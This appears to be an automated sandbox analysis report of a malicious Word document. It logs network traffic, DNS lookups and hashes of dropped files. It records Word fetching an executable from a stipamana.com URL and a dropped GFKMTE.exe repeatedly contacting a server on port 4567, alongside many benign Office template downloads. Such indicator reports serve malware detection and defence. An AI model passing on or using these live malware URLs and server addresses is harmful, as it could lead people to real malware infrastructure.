      GET /support/templates/en-us/tp0345747501.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 271273
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: IUN4l8m4isLLK7L++SLRkQ==
      Last-Modified: Wed, 29 Aug 2018 18:16:49 GMT
      ETag: 0x8D60DDB967B9FA5
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: dacba5b7-401e-0105-2397-a08a43000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-us
      DNS
      217.26.123.92.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      217.26.123.92.in-addr.arpa
      IN PTR
      Response
      217.26.123.92.in-addr.arpa
      IN PTR
      a92-123-26-217.deploy.static.akamaitechnologies.com
    • flag-us
      DNS
      136.252.19.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      136.252.19.2.in-addr.arpa
      IN PTR
      Response
      136.252.19.2.in-addr.arpa
      IN PTR
      a2-19-252-136.deploy.static.akamaitechnologies.com
    • flag-us
      DNS
      dns.stipamana.com
      GFKMTE.exe
      Remote address:
      8.8.8.8:53
      Request
      dns.stipamana.com
      IN A
      Response
      dns.stipamana.com
      IN A
      87.120.121.160
    • flag-us
      DNS
      154.239.44.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      154.239.44.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      56.163.245.4.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      56.163.245.4.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      15.164.165.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      15.164.165.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      180.129.81.91.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      180.129.81.91.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      85.49.80.91.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      85.49.80.91.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      3.17.178.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      3.17.178.52.in-addr.arpa
      IN PTR
      Response
    • 52.109.89.19:443
      https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
      tls, http
      WINWORD.EXE
      1.8kB
      8.2kB
      12
      11

      HTTP Request

      POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

      HTTP Response

      200
    • 94.156.167.57:443
      https://www.stipamana.com/yuerthreytwsytysrertersedtryerytsrt/erwgsergtseggszgdargaregwa/strsrthtghtghdfghsgthw/cfdhxdzhtfxgh.exe
      tls, http
      WINWORD.EXE
      7.5kB
      187.8kB
      147
      142

      HTTP Request

      GET https://www.stipamana.com/yuerthreytwsytysrertersedtryerytsrt/erwgsergtseggszgdargaregwa/strsrthtghtghdfghsgthw/cfdhxdzhtfxgh.exe

      HTTP Response

      200
    • 88.221.134.115:80
      http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgP9IoBvxPBYG5AD8lLDTzup%2FQ%3D%3D
      http
      WINWORD.EXE
      518 B
      1.1kB
      6
      4

      HTTP Request

      GET http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgP9IoBvxPBYG5AD8lLDTzup%2FQ%3D%3D

      HTTP Response

      200
    • 92.123.26.217:443
      https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C
      tls, http
      WINWORD.EXE
      1.3kB
      6.0kB
      10
      11

      HTTP Request

      GET https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab
      tls, http
      WINWORD.EXE
      9.9kB
      256.8kB
      152
      191

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab
      tls, http
      WINWORD.EXE
      75.8kB
      2.7MB
      1353
      1914

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab
      tls, http
      WINWORD.EXE
      27.8kB
      712.0kB
      458
      518

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab
      tls, http
      WINWORD.EXE
      4.0kB
      87.4kB
      57
      71

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab
      tls, http
      WINWORD.EXE
      35.7kB
      1.1MB
      607
      826

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab
      tls, http
      WINWORD.EXE
      27.4kB
      606.9kB
      399
      442

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab
      tls, http
      WINWORD.EXE
      36.0kB
      759.1kB
      508
      551

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab
      tls, http
      WINWORD.EXE
      116.6kB
      3.6MB
      1941
      2561

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab
      tls, http
      WINWORD.EXE
      50.6kB
      1.2MB
      746
      849

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab
      tls, http
      WINWORD.EXE
      13.2kB
      273.9kB
      186
      203

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab
      tls, http
      WINWORD.EXE
      68.0kB
      1.9MB
      1100
      1342

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab
      tls, http
      WINWORD.EXE
      1.7kB
      37.1kB
      21
      33

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab
      tls, http
      WINWORD.EXE
      1.7kB
      37.0kB
      21
      33

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab
      tls, http
      WINWORD.EXE
      52.6kB
      1.4MB
      795
      1006

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab
      tls, http
      WINWORD.EXE
      10.7kB
      322.2kB
      169
      237

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab
      tls, http
      WINWORD.EXE
      1.8kB
      41.7kB
      23
      36

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab
      tls, http
      WINWORD.EXE
      32.0kB
      751.6kB
      473
      545

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab
      tls, http
      WINWORD.EXE
      1.6kB
      27.8kB
      18
      26

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab
      tls, http
      WINWORD.EXE
      51.1kB
      2.0MB
      930
      1417

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab
      tls, http
      WINWORD.EXE
      1.7kB
      37.1kB
      21
      33

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab
      tls, http
      WINWORD.EXE
      1.7kB
      32.9kB
      20
      30

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab
      tls, http
      WINWORD.EXE
      1.6kB
      27.9kB
      18
      26

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab
      tls, http
      WINWORD.EXE
      100.5kB
      3.4MB
      1701
      2438

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab
      tls, http
      WINWORD.EXE
      1.6kB
      26.3kB
      17
      25

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab
      tls, http
      WINWORD.EXE
      46.0kB
      1.0MB
      674
      733

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab
      tls, http
      WINWORD.EXE
      1.6kB
      27.6kB
      18
      26

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab
      tls, http
      WINWORD.EXE
      1.6kB
      25.6kB
      17
      25

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab
      tls, http
      WINWORD.EXE
      1.6kB
      27.0kB
      19
      27

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab
      tls, http
      WINWORD.EXE
      2.1kB
      31.2kB
      26
      29

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab
      tls, http
      WINWORD.EXE
      1.7kB
      28.5kB
      20
      27

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab
      tls, http
      WINWORD.EXE
      1.6kB
      28.1kB
      18
      26

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab
      tls, http
      WINWORD.EXE
      1.8kB
      27.1kB
      21
      26

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab
      tls, http
      WINWORD.EXE
      1.7kB
      25.0kB
      19
      24

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab
      tls, http
      WINWORD.EXE
      10.9kB
      290.9kB
      164
      215

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab
      tls, http
      WINWORD.EXE
      11.8kB
      310.3kB
      183
      228

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab
      tls, http
      WINWORD.EXE
      51.2kB
      2.7MB
      1027
      1926

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab
      tls, http
      WINWORD.EXE
      13.7kB
      278.5kB
      185
      206

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab

      HTTP Response

      200
    • 2.19.252.136:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab
      tls, http
      WINWORD.EXE
      12.2kB
      286.4kB
      191
      210

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab

      HTTP Response

      200
    • 87.120.121.160:4567
      dns.stipamana.com
      GFKMTE.exe
      260 B
      200 B
      5
      5
    • 87.120.121.160:4567
      dns.stipamana.com
      GFKMTE.exe
      260 B
      200 B
      5
      5
    • 87.120.121.160:4567
      dns.stipamana.com
      GFKMTE.exe
      260 B
      200 B
      5
      5
    • 87.120.121.160:4567
      dns.stipamana.com
      GFKMTE.exe
      260 B
      200 B
      5
      5
    • 87.120.121.160:4567
      dns.stipamana.com
      GFKMTE.exe
      260 B
      160 B
      5
      4
    • 87.120.121.160:4567
      dns.stipamana.com
      GFKMTE.exe
      260 B
      200 B
      5
      5
    • 87.120.121.160:4567
      dns.stipamana.com
      GFKMTE.exe
      260 B
      200 B
      5
      5
    • 87.120.121.160:4567
      dns.stipamana.com
      GFKMTE.exe
      260 B
      200 B
      5
      5
    • 87.120.121.160:4567
      dns.stipamana.com
      GFKMTE.exe
      260 B
      200 B
      5
      5
    • 87.120.121.160:4567
      dns.stipamana.com
      GFKMTE.exe
      260 B
      200 B
      5
      5
    • 8.8.8.8:53
      196.249.167.52.in-addr.arpa
      dns
      73 B
      147 B
      1
      1

      DNS Request

      196.249.167.52.in-addr.arpa

    • 8.8.8.8:53
      134.130.81.91.in-addr.arpa
      dns
      72 B
      147 B
      1
      1

      DNS Request

      134.130.81.91.in-addr.arpa

    • 8.8.8.8:53
      roaming.officeapps.live.com
      dns
      WINWORD.EXE
      73 B
      247 B
      1
      1

      DNS Request

      roaming.officeapps.live.com

      DNS Response

      52.109.89.19

    • 8.8.8.8:53
      www.stipamana.com
      dns
      WINWORD.EXE
      63 B
      79 B
      1
      1

      DNS Request

      www.stipamana.com

      DNS Response

      94.156.167.57

    • 8.8.8.8:53
      r10.o.lencr.org
      dns
      WINWORD.EXE
      61 B
      272 B
      1
      1

      DNS Request

      r10.o.lencr.org

      DNS Response

      88.221.134.115
      88.221.134.137
      88.221.135.106
      88.221.135.115
      88.221.134.89
      88.221.135.107
      88.221.134.107
      88.221.135.105
      88.221.134.91

    • 8.8.8.8:53
      18.89.109.52.in-addr.arpa
      dns
      71 B
      145 B
      1
      1

      DNS Request

      18.89.109.52.in-addr.arpa

    • 8.8.8.8:53
      30.243.111.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      30.243.111.52.in-addr.arpa

    • 8.8.8.8:53
      19.89.109.52.in-addr.arpa
      dns
      71 B
      145 B
      1
      1

      DNS Request

      19.89.109.52.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      76.32.126.40.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      76.32.126.40.in-addr.arpa

    • 8.8.8.8:53
      57.167.156.94.in-addr.arpa
      dns
      72 B
      132 B
      1
      1

      DNS Request

      57.167.156.94.in-addr.arpa

    • 8.8.8.8:53
      168.245.100.95.in-addr.arpa
      dns
      73 B
      139 B
      1
      1

      DNS Request

      168.245.100.95.in-addr.arpa

    • 8.8.8.8:53
      115.134.221.88.in-addr.arpa
      dns
      73 B
      139 B
      1
      1

      DNS Request

      115.134.221.88.in-addr.arpa

    • 8.8.8.8:53
      217.106.137.52.in-addr.arpa
      dns
      73 B
      147 B
      1
      1

      DNS Request

      217.106.137.52.in-addr.arpa

    • 8.8.8.8:53
      17.173.189.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      17.173.189.20.in-addr.arpa

    • 8.8.8.8:53
      metadata.templates.cdn.office.net
      dns
      WINWORD.EXE
      79 B
      231 B
      1
      1

      DNS Request

      metadata.templates.cdn.office.net

      DNS Response

      92.123.26.217
      92.123.26.202

    • 8.8.8.8:53
      28.118.140.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      28.118.140.52.in-addr.arpa

    • 8.8.8.8:53
      binaries.templates.cdn.office.net
      dns
      WINWORD.EXE
      79 B
      202 B
      1
      1

      DNS Request

      binaries.templates.cdn.office.net

      DNS Response

      2.19.252.136
      2.19.252.143

    • 8.8.8.8:53
      217.26.123.92.in-addr.arpa
      dns
      72 B
      137 B
      1
      1

      DNS Request

      217.26.123.92.in-addr.arpa

    • 8.8.8.8:53
      136.252.19.2.in-addr.arpa
      dns
      71 B
      135 B
      1
      1

      DNS Request

      136.252.19.2.in-addr.arpa

    • 8.8.8.8:53
      dns.stipamana.com
      dns
      GFKMTE.exe
      63 B
      79 B
      1
      1

      DNS Request

      dns.stipamana.com

      DNS Response

      87.120.121.160

    • 8.8.8.8:53
      154.239.44.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      154.239.44.20.in-addr.arpa

    • 8.8.8.8:53
      56.163.245.4.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      56.163.245.4.in-addr.arpa

    • 8.8.8.8:53
      15.164.165.52.in-addr.arpa
      dns
      72 B
      146 B
      1
      1

      DNS Request

      15.164.165.52.in-addr.arpa

    • 8.8.8.8:53
      180.129.81.91.in-addr.arpa
      dns
      72 B
      147 B
      1
      1

      DNS Request

      180.129.81.91.in-addr.arpa

    • 8.8.8.8:53
      85.49.80.91.in-addr.arpa
      dns
      70 B
      145 B
      1
      1

      DNS Request

      85.49.80.91.in-addr.arpa

    • 8.8.8.8:53
      3.17.178.52.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      3.17.178.52.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GFKMTE.exe.log

      Filesize

      706B

      MD5

      d95c58e609838928f0f49837cab7dfd2

      SHA1

      55e7139a1e3899195b92ed8771d1ca2c7d53c916

      SHA256

      0407c814aef0d62aec7fd39b7c2f614746f0d8ff41f8ef957736f520f14b0339

      SHA512

      405310b29a833604c6627063bfdcf055a197e01f633ef21da238f1a6415a02e21315d689b4a6669db23e82152bed6f3492afb60963e6b2a0e9bb2ac09a480b5d

    • C:\Users\Admin\AppData\Local\Temp\tmpAA59.tmp

      Filesize

      1KB

      MD5

      dabe93a03c5560ab1670cf79b8d28566

      SHA1

      69738fe43d4550ece028ff2795a54bbad0985414

      SHA256

      743e8b28a38e98ea27ef07f17b7529976979c7b01eab92586a6cb686c0d1f68d

      SHA512

      15b3b49c46901e00a73def834225df28fd843af1e9ae594c7d061406209f6ce57277673c9c1ae3ed541f989fa499fd3e88929e00ebded6d23301f8d3680a6c57

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl

      Filesize

      245KB

      MD5

      f883b260a8d67082ea895c14bf56dd56

      SHA1

      7954565c1f243d46ad3b1e2f1baf3281451fc14b

      SHA256

      ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

      SHA512

      d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

    • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

      Filesize

      16B

      MD5

      d29962abc88624befc0135579ae485ec

      SHA1

      e40a6458296ec6a2427bcb280572d023a9862b31

      SHA256

      a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866

      SHA512

      4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe

      Filesize

      173KB

      MD5

      94a7e3859c2e4238421cdfe73d49603c

      SHA1

      03f03c5b5d8cf362aa52b9e793e7be398d779c21

      SHA256

      639135eb69333aba7ecb762072d8bef1d2db83e54edbe627dd223039142b8c91

      SHA512

      74048463606f7017bd8bd3c92773edde5a406247c5ea437b8ee580a3d9e65eb755aa44de466fc2aabef8b9a67c40163afeb3df9bc9fb35f8afe20814d5de85b5

